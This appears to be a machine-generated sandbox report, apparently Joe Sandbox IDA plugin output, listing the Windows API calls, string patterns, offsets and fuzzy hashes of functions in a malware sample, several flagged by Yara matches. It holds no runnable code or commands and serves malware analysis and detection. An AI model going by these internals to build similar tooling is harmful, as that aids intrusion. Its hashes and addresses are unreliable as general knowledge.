                                          • Instruction Fuzzy Hash: D1E12971940108AFDF05EBA8DC96EEE7379FF55301F148159F106A35A1EE34AB48CB62
                                          APIs
                                            • Part of subcall function 00412FF0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413038
                                            • Part of subcall function 00413260: lstrlen.KERNEL32(?,00414838,?,00000000,00414682), ref: 00413275
                                            • Part of subcall function 00413260: lstrcpy.KERNEL32(00000000), ref: 004132B4
                                            • Part of subcall function 00413260: lstrcat.KERNEL32(00000000,00000000), ref: 004132C2
                                            • Part of subcall function 00413150: lstrcpy.KERNEL32(?,00414682), ref: 004131B5
                                            • Part of subcall function 004115D0: GetSystemTime.KERNEL32(?,00000000,00414191,?,?,?,?,?,?,?,?,?,00403A73,?,00000014), ref: 004115F6
                                            • Part of subcall function 004131D0: lstrcpy.KERNEL32(00000000,?), ref: 00413222
                                            • Part of subcall function 004131D0: lstrcat.KERNEL32(00000000), ref: 00413232
                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00408EC7
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00408ECE
                                          • lstrcat.KERNEL32(?,00000000), ref: 00409008
                                          • lstrcat.KERNEL32(?,00414AB4), ref: 00409017
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040902A
                                          • lstrcat.KERNEL32(?,00414AB8), ref: 00409039
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040904C
                                          • lstrcat.KERNEL32(?,00414ABC), ref: 0040905B
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040906E
                                          • lstrcat.KERNEL32(?,00414AC0), ref: 0040907D
                                          • lstrcat.KERNEL32(?,00000000), ref: 00409090
                                          • lstrcat.KERNEL32(?,00414AC4), ref: 0040909F
                                          • lstrcat.KERNEL32(?,00000000), ref: 004090B2
                                          • lstrcat.KERNEL32(?,00414AC8), ref: 004090C1
                                          • lstrcat.KERNEL32(?,00000000), ref: 004090D4
                                          • lstrcat.KERNEL32(?,00414ACC), ref: 004090E3
                                            • Part of subcall function 004130D0: lstrlen.KERNEL32(00000000,?,?,0040F9D0,00414677,00414676,?,?,00410567,00000000,?,008859C8,?,00414834,?,00000000), ref: 004130DB
                                            • Part of subcall function 004130D0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413135
                                          • lstrlen.KERNEL32(?), ref: 0040912A
                                          • lstrlen.KERNEL32(?), ref: 00409139
                                          • memset.MSVCRT ref: 00409182
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpy$lstrlen$Heap$AllocateProcessSystemTimememset
                                          • String ID:
                                          • API String ID: 245975372-0
                                          • Opcode ID: 8224fe9bfe33752ef812c58f9a3c07454bd887e93f5e4e8b5787d87485b44b35
                                          • Instruction ID: ba2303238d793748fed188a988be053d5d0ac0d0c647531a17e04c80a5b47ec6
                                          • Opcode Fuzzy Hash: 8224fe9bfe33752ef812c58f9a3c07454bd887e93f5e4e8b5787d87485b44b35
                                          • Instruction Fuzzy Hash: 3AE15D71910108AFCB04EFA1DD96EEE7779AF58305F10415EF506A30A5DF386B88CB69
                                          APIs
                                            • Part of subcall function 00413050: lstrcpy.KERNEL32(?,00000000), ref: 00413096
                                            • Part of subcall function 004038C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00403946
                                            • Part of subcall function 00412FF0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413038
                                            • Part of subcall function 00413260: lstrlen.KERNEL32(?,00414838,?,00000000,00414682), ref: 00413275
                                            • Part of subcall function 00413260: lstrcpy.KERNEL32(00000000), ref: 004132B4
                                            • Part of subcall function 00413260: lstrcat.KERNEL32(00000000,00000000), ref: 004132C2
                                            • Part of subcall function 00413150: lstrcpy.KERNEL32(?,00414682), ref: 004131B5
                                            • Part of subcall function 004131D0: lstrcpy.KERNEL32(00000000,?), ref: 00413222
                                            • Part of subcall function 004131D0: lstrcat.KERNEL32(00000000), ref: 00413232
                                          • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,00000000,00000000,?,00000000,00000000,?,00414D94), ref: 00404F7E
                                          • lstrlen.KERNEL32(00000000), ref: 00404F8F
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00404FA0
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00404FA7
                                          • lstrlen.KERNEL32(00000000), ref: 00404FBC
                                          • memcpy.MSVCRT ref: 00404FD3
                                          • lstrlen.KERNEL32(00000000), ref: 00404FE5
                                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404FFE
                                          • memcpy.MSVCRT ref: 0040500B
                                          • lstrlen.KERNEL32(00000000,?,?), ref: 00405028
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Similarity
                                          • API ID: lstrlen$lstrcpy$Heaplstrcatmemcpy$AllocateProcess
                                          • String ID: "$"$------$------$------
                                          • API String ID: 1086105663-2180234286
                                          • Opcode ID: 26eec3760455270602d5bd66fec490e262ed912d703d5f9d989fe5dc8aa845c2
                                          • Instruction ID: b3acf589dced84f0a0bdb3bbece81a8fabf167722516a49aa3269f8227201ab4
                                          • Opcode Fuzzy Hash: 26eec3760455270602d5bd66fec490e262ed912d703d5f9d989fe5dc8aa845c2
                                          • Instruction Fuzzy Hash: B312FA76920118AACB15EFA1DC95FEEB378BF54705F00419EB10663195EF782B88CF68
                                          APIs
                                          • strtok_s.MSVCRT ref: 0040B837
                                          • strtok_s.MSVCRT ref: 0040BC5F
                                            • Part of subcall function 004130D0: lstrlen.KERNEL32(00000000,?,?,0040F9D0,00414677,00414676,?,?,00410567,00000000,?,008859C8,?,00414834,?,00000000), ref: 004130DB
                                            • Part of subcall function 004130D0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413135
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Similarity
                                          • API ID: strtok_s$lstrcpylstrlen
                                          • String ID:
                                          • API String ID: 348468850-0
                                          • Opcode ID: 7b2e34e678f2bd22796688cf0585c68a256fcf47a522aaee57e06a3a9882f49d
                                          • Instruction ID: 357e97b8220c04f1253e5ea3142bfa513dde73726e007ec1678d313707bb5995
                                          • Opcode Fuzzy Hash: 7b2e34e678f2bd22796688cf0585c68a256fcf47a522aaee57e06a3a9882f49d
                                          • Instruction Fuzzy Hash: 9CC1A5B59001089BCB14EF60DC89FDAB779AB58304F0485DEE50967151EF78ABC5CF98
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Similarity
                                          • API ID: lstrcat
                                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                          • API String ID: 4038537762-2524465048
                                          • Opcode ID: fc8f8692cfdbc3652edcd45e82f8c6a2cfae9c653859402aab069b0520a3686c
                                          • Instruction ID: 2ab86484d6f9dce3bb57da3c3004be3ba42ac5a63d99f8946a593feb9ea809c1
                                          • Opcode Fuzzy Hash: fc8f8692cfdbc3652edcd45e82f8c6a2cfae9c653859402aab069b0520a3686c
                                          • Instruction Fuzzy Hash: E19163B2A002089FCB24DFA4DC85FEE737DBB44704F08859AF61993195DB749A84CF95
                                          APIs
                                            • Part of subcall function 008A32B7: lstrcpy.KERNEL32(?,00000000), ref: 008A32FD
                                            • Part of subcall function 00893B27: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00893BAD
                                            • Part of subcall function 008A3257: lstrcpy.KERNEL32(5GA,00000000), ref: 008A329F
                                            • Part of subcall function 008A34C7: lstrlen.KERNEL32(00000000,?,00000000,?,00000000,00414736,00414735), ref: 008A34DC
                                            • Part of subcall function 008A34C7: lstrcpy.KERNEL32(00000000), ref: 008A351B
                                            • Part of subcall function 008A34C7: lstrcat.KERNEL32(00000000,00000000), ref: 008A3529
                                            • Part of subcall function 008A33B7: lstrcpy.KERNEL32(?,00000000), ref: 008A341C
                                            • Part of subcall function 008A3437: lstrcpy.KERNEL32(00000000,?), ref: 008A3489
                                            • Part of subcall function 008A3437: lstrcat.KERNEL32(00000000), ref: 008A3499
                                          • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,00414D98,00000000,?,00618054,00000000,?,0061824C,00000000,?,00414D94), ref: 008951E5
                                          • lstrlen.KERNEL32(00000000), ref: 008951F6
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00895207
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0089520E
                                          • lstrlen.KERNEL32(00000000), ref: 00895223
                                          • memcpy.MSVCRT ref: 0089523A
                                          • lstrlen.KERNEL32(00000000), ref: 0089524C
                                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00895265
                                          • memcpy.MSVCRT ref: 00895272
                                          • lstrlen.KERNEL32(00000000,?,?), ref: 0089528F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Similarity
                                          • API ID: lstrlen$lstrcpy$Heaplstrcatmemcpy$AllocateProcess
                                          • String ID:
                                          • API String ID: 1086105663-0
                                          • Opcode ID: ba30d7ea4f629b7e4abd9e4e21bca524f3400424943e8c30884d53483c844499
                                          • Instruction ID: 146cd8d3d1b831c1b56ed4db8ea6e5ad78f1770aeb9bf856c96ad7a7871c51bf
                                          • Opcode Fuzzy Hash: ba30d7ea4f629b7e4abd9e4e21bca524f3400424943e8c30884d53483c844499
                                          • Instruction Fuzzy Hash: E112F971810118ABDF16EBA8EC96FEEB378FF65700F144199B10AA3591EF306B48CB51
                                          APIs
                                          • lstrcpy.KERNEL32(?,?), ref: 0089BB72
                                          • lstrcpy.KERNEL32(?,00000000), ref: 0089BBAE
                                            • Part of subcall function 008A1F37: lstrlen.KERNEL32(?), ref: 008A1F7E
                                          • lstrcpy.KERNEL32(?,00000000), ref: 0089BBF6
                                          • lstrcpy.KERNEL32(?,00000000), ref: 0089BC3E
                                          • lstrcpy.KERNEL32(?,00000000), ref: 0089BC85
                                          • lstrcpy.KERNEL32(?,00000000), ref: 0089BCCD
                                          • lstrcpy.KERNEL32(?,00000000), ref: 0089BD15
                                          • lstrcpy.KERNEL32(?,00000000), ref: 0089BD5C
                                          • lstrcpy.KERNEL32(?,00000000), ref: 0089BDA4
                                            • Part of subcall function 008A3337: lstrlen.KERNEL32(0089427C,?,?,0089427C,00414716), ref: 008A3342
                                            • Part of subcall function 008A3337: lstrcpy.KERNEL32(00414716,00000000), ref: 008A339C
                                          • strtok_s.MSVCRT ref: 0089BEC6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$strtok_s
                                          • String ID:
                                          • API String ID: 1077714376-0
                                          • Opcode ID: 725bc5e25a43332ee6962f2157020678be1d44ab17f88fe9a2f99987aad1004f
                                          • Instruction ID: 61e0ec03de72de80b2b297f82d23cfac629e53ba677ea9f5ac4c48d9f8e98906
                                          • Opcode Fuzzy Hash: 725bc5e25a43332ee6962f2157020678be1d44ab17f88fe9a2f99987aad1004f
                                          • Instruction Fuzzy Hash: 1F717FB29001189BDF55EBB4DC8AEEE7379FB55300F088699F109E3141EE759B848F61
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0040E3F0
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0040E3F7
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040E529
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040E53C
                                          • lstrlen.KERNEL32(?), ref: 0040E549
                                          • lstrlen.KERNEL32(?), ref: 0040E55A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Similarity
                                          • API ID: Heaplstrcatlstrlen$AllocateProcess
                                          • String ID: %s\%s$%s\*
                                          • API String ID: 196298277-2848263008
                                          • Opcode ID: 53a5f5156e2f5994bced82f4df54ca842df4e2015695b9087d017d16251fd8a7
                                          • Instruction ID: 057a8c359136346fbda44e42cf223d9c2834f713af44f8c060b811d7258d1b6b
                                          • Opcode Fuzzy Hash: 53a5f5156e2f5994bced82f4df54ca842df4e2015695b9087d017d16251fd8a7
                                          • Instruction Fuzzy Hash: 985153B1940218AFCB10EBA0DC89EDE7779AB58704F04859AF609A3194DF749BC48F95
                                          APIs
                                          • memset.MSVCRT ref: 0089E3A5
                                          • memset.MSVCRT ref: 0089E3BC
                                          • lstrcat.KERNEL32(?,00000000), ref: 0089E3F3
                                          • lstrcat.KERNEL32(?,00618268), ref: 0089E412
                                          • lstrcat.KERNEL32(?,?), ref: 0089E426
                                          • lstrcat.KERNEL32(?,00618514), ref: 0089E43A
                                            • Part of subcall function 008A3257: lstrcpy.KERNEL32(5GA,00000000), ref: 008A329F
                                            • Part of subcall function 00896637: memcmp.MSVCRT ref: 008966EB
                                            • Part of subcall function 00896317: CloseHandle.KERNEL32(000000FF), ref: 008963F1
                                            • Part of subcall function 00896417: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00894265,00000000,00000000), ref: 00896446
                                            • Part of subcall function 00896417: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00894265,00000000,00000000), ref: 00896481
                                            • Part of subcall function 00896767: memcmp.MSVCRT ref: 00896782
                                            • Part of subcall function 00896767: memset.MSVCRT ref: 008967B5
                                          • lstrcat.KERNEL32(?,00000000), ref: 0089E581
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 0089E5B0
                                          • lstrcat.KERNEL32(00000000,?), ref: 0089E5C3
                                          • lstrcat.KERNEL32(00000000,004147D0), ref: 0089E5D2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Similarity
                                          • API ID: lstrcat$memset$BinaryCryptStringmemcmp$CloseHandlelstrcpy
                                          • String ID:
                                          • API String ID: 2430198047-0
                                          • Opcode ID: 17314aac0f6bf978e8ad9dc97e0f07646332481be90fd5a35d147ebf3c297df5
                                          • Instruction ID: 7ef327045b6d385fb71e0ca0cb8553cc94c9a11f5044c0b5103456cd1c19977c
                                          • Opcode Fuzzy Hash: 17314aac0f6bf978e8ad9dc97e0f07646332481be90fd5a35d147ebf3c297df5
                                          • Instruction Fuzzy Hash: DA713FB2900208ABDF14EBA4DC89FDE7779FF98300F188599F609D7181EA759B44CB61
                                          APIs
                                          • memset.MSVCRT ref: 0040E13E
                                          • memset.MSVCRT ref: 0040E155
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040E18C
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040E1AB
                                          • lstrcat.KERNEL32(?,?), ref: 0040E1BF
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040E1D3
                                            • Part of subcall function 00412FF0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413038
                                            • Part of subcall function 004063D0: memcmp.MSVCRT ref: 00406484
                                            • Part of subcall function 004060B0: CloseHandle.KERNEL32(000000FF), ref: 0040618A
                                            • Part of subcall function 004061B0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00403FFE,00000000,00000000), ref: 004061DF
                                            • Part of subcall function 004061B0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00403FFE,00000000,00000000), ref: 0040621A
                                            • Part of subcall function 00406500: memcmp.MSVCRT ref: 0040651B
                                            • Part of subcall function 00406500: memset.MSVCRT ref: 0040654E
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040E31A
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040E349
                                          • lstrcat.KERNEL32(00000000,?), ref: 0040E35C
                                          • lstrcat.KERNEL32(00000000,004147D0), ref: 0040E36B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Similarity
                                          • API ID: lstrcat$memset$BinaryCryptStringmemcmp$CloseHandlelstrcpy
                                          • String ID:
                                          • API String ID: 2430198047-0
                                          • Opcode ID: a0f8bee08b557520875e11261d1a57ed00df94edf4339c2beed7a363dba5041a
                                          • Instruction ID: 3bc3db500648d3b8e2315029556d61a23618a9b90b51ac58705b3bafe077aa38
                                          • Opcode Fuzzy Hash: a0f8bee08b557520875e11261d1a57ed00df94edf4339c2beed7a363dba5041a
                                          • Instruction Fuzzy Hash: E47176B2900208ABCB14EBA1DC85FDE7779AB48304F04859DF609A7195EB74DB94CF64
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,00000000,00000000,?,00414704,00000000,?,00000000,00000000,?,00000000), ref: 00410D3D
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00410D44
                                          • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00410D65
                                          • __aulldiv.LIBCMT ref: 00410D7F
                                          • __aulldiv.LIBCMT ref: 00410D8D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Similarity
                                          • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatus
                                          • String ID: %d MB$@
                                          • API String ID: 2728336565-3474575989
                                          • Opcode ID: 427e3868cf694f15b19fe23a83d4bd4a241364a3348d377c3a02fcf3f873bae2
                                          • Instruction ID: 707000b30deade13748eefd01e6ef1cf8622db087f157e1a1a0b944f5097d835
                                          • Opcode Fuzzy Hash: 427e3868cf694f15b19fe23a83d4bd4a241364a3348d377c3a02fcf3f873bae2
                                          • Instruction Fuzzy Hash: D2113CB0D40208ABDB00DBD4DC45BEEB778AB44704F108509F704AB280DBB8A9408B98
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Similarity
                                          • API ID: ExitProcess$DefaultLangUser
                                          • String ID: *
                                          • API String ID: 1494266314-163128923
                                          • Opcode ID: da7414cfd4f6ef5a06fe243907d838e8ceda39788d4d1a4d1814055982dc2574
                                          • Instruction ID: 6bb6e8a3c801933b98899c13c51f9ac433c06584565f6ba3550c305161e96221
                                          • Opcode Fuzzy Hash: da7414cfd4f6ef5a06fe243907d838e8ceda39788d4d1a4d1814055982dc2574
                                          • Instruction Fuzzy Hash: C5F03A30944208EFD3449FE0A9697DCBBB1EB04702F24A196E609876D0CAB44A909BA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %s\%s$%s\%s$%s\*
                                          • API String ID: 0-445461498
                                          • Opcode ID: 9f67832a7bc174ad6bb297f98ca892c05b62021e56163b6fa7a415511eebbadb
                                          • Instruction ID: 653d663be24117141108ce37a0b39abbb6dfde9dc7eb1b584f6f8f355b072eab
                                          • Opcode Fuzzy Hash: 9f67832a7bc174ad6bb297f98ca892c05b62021e56163b6fa7a415511eebbadb
                                          • Instruction Fuzzy Hash: 156164B2900218AFCB10EBA1DC85EEA777DBB48704F04859EF60993191EF749AC4CF95
                                          APIs
                                            • Part of subcall function 00413050: lstrcpy.KERNEL32(?,00000000), ref: 00413096
                                            • Part of subcall function 004038C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00403946
                                            • Part of subcall function 00412FF0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413038
                                            • Part of subcall function 00413260: lstrlen.KERNEL32(?,00414838,?,00000000,00414682), ref: 00413275
                                            • Part of subcall function 00413260: lstrcpy.KERNEL32(00000000), ref: 004132B4
                                            • Part of subcall function 00413260: lstrcat.KERNEL32(00000000,00000000), ref: 004132C2
                                            • Part of subcall function 00413150: lstrcpy.KERNEL32(?,00414682), ref: 004131B5
                                            • Part of subcall function 004131D0: lstrcpy.KERNEL32(00000000,?), ref: 00413222
                                            • Part of subcall function 004131D0: lstrcat.KERNEL32(00000000), ref: 00413232
                                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00414713,00000000,?,?,00000000,?,",00000000,?,00000000), ref: 00403EF8
                                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00403F14
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$lstrcat
                                          • String ID: "$"$------$------$------
                                          • API String ID: 2500673778-2180234286
                                          • Opcode ID: 44bb66c9e2f232fd683d127f420070c1dc3cdca0f1b7e3d0de3f29f0438fd1f5
                                          • Instruction ID: 6df12dffe85d056e43b5733e99d7b47ed59c0aa1f6b5f7496db5cac169064cb1
                                          • Opcode Fuzzy Hash: 44bb66c9e2f232fd683d127f420070c1dc3cdca0f1b7e3d0de3f29f0438fd1f5
                                          • Instruction Fuzzy Hash: 9D121972910118AACB14EF91CC92FEEB779AF19305F10419EB10663195EF782F88CF69
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %s\%s
                                          • API String ID: 0-4073750446
                                          • Opcode ID: bda60e50286d89f94d235c1a7786bef5cc2987b828391edf2943488f008da3cd
                                          • Instruction ID: 1750d670eb3d14c68824cd0173b1008080d249de5a15bbd1f76bd54184e7e69c
                                          • Opcode Fuzzy Hash: bda60e50286d89f94d235c1a7786bef5cc2987b828391edf2943488f008da3cd
                                          • Instruction Fuzzy Hash: DC5135B1900219ABCB14EBA0DC85EEE737DBB54704F04859EB61992094DF799BC8CF94
                                          APIs
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,00618168), ref: 008A2428
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,0061850C), ref: 008A2441
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,00618578), ref: 008A2459
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,006181C8), ref: 008A2471
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,006181B4), ref: 008A248A
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,00618254), ref: 008A24A2
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,00618420), ref: 008A24BA
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,00618298), ref: 008A24D3
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,006184EC), ref: 008A24EB
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,00618490), ref: 008A2503
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,00618314), ref: 008A251C
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,00618248), ref: 008A2534
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,00618540), ref: 008A254C
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,00618018), ref: 008A2565
                                            • Part of subcall function 008A3257: lstrcpy.KERNEL32(5GA,00000000), ref: 008A329F
                                          • ExitProcess.KERNEL32 ref: 008A06BF
                                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00618488,?,00414834,?,00000000,?,00414838,?,00000000,00414682), ref: 008A0782
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 008A07A0
                                          • CloseHandle.KERNEL32(?,00000000,?,00618488,?,00414834,?,00000000,?,00414838,?,00000000,00414682), ref: 008A07D2
                                          • ExitProcess.KERNEL32 ref: 008A07DA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$EventExitProcess$CloseCreateHandleOpenlstrcpy
                                          • String ID:
                                          • API String ID: 2380255356-0
                                          • Opcode ID: 4aecd75034a670bfe7329fd9e7515af95a6ef275aa1d0a5b97f5ba176cf0156d
                                          • Instruction ID: 85e8c58c5caeeb1f75f5cce5fccca526051c680270cc215868ccd0cd8cc04120
                                          • Opcode Fuzzy Hash: 4aecd75034a670bfe7329fd9e7515af95a6ef275aa1d0a5b97f5ba176cf0156d
                                          • Instruction Fuzzy Hash: 73313A31904209ABEF04FBF8DC56AFD7775FF56300F184419B202E2992DF749A04CA62
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,006182BC,00000000,?,00414704,00000000,?,00000000,00000000,?,006180D4), ref: 008A0FA4
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 008A0FAB
                                          • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 008A0FCC
                                          • __aulldiv.LIBCMT ref: 008A0FE6
                                          • __aulldiv.LIBCMT ref: 008A0FF4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatus
                                          • String ID: @
                                          • API String ID: 2728336565-2766056989
